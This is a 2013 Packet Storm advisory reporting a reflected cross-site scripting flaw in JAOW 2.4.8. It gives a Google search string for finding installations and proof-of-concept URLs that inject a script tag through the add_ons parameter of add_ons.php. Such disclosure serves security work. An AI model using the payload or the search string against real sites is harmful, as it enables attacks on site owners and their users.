JAOW 2.4.8 Cross Site Scripting

2013-03-24T00:00:00
ID PACKETSTORM:120922
Type packetstorm
Reporter Metropolis
Modified 2013-03-24T00:00:00

Description

                                        
                                            `###########################################  
#  
# Script Name : JAOW 2.4.8  
#  
# Version : 2.4.8  
#  
# Bug Type : XSS vulnerability  
#  
# Found by : Metropolis  
#  
# Home : http://metropolis.fr.cr  
#  
# Discovered : 23/03/2013  
#  
# Download app : http://www.jaow.net/uploads/jaow_2.4.8.zip  
#  
# Google search : Propulsé par Jaow 2.4.8 -   
#  
###########################################  
  
PoC :  
  
http://[target]/[path]/add_ons.php?add_ons=[Xss]  
  
Example :  
  
http://[target]/[path]/add_ons.php?add_ons=1"><script>alert(31337);</script>  
  
local Example :  
  
http://localhost/demo/add_ons.php?add_ons=1"><script>alert(31337);</script>  
`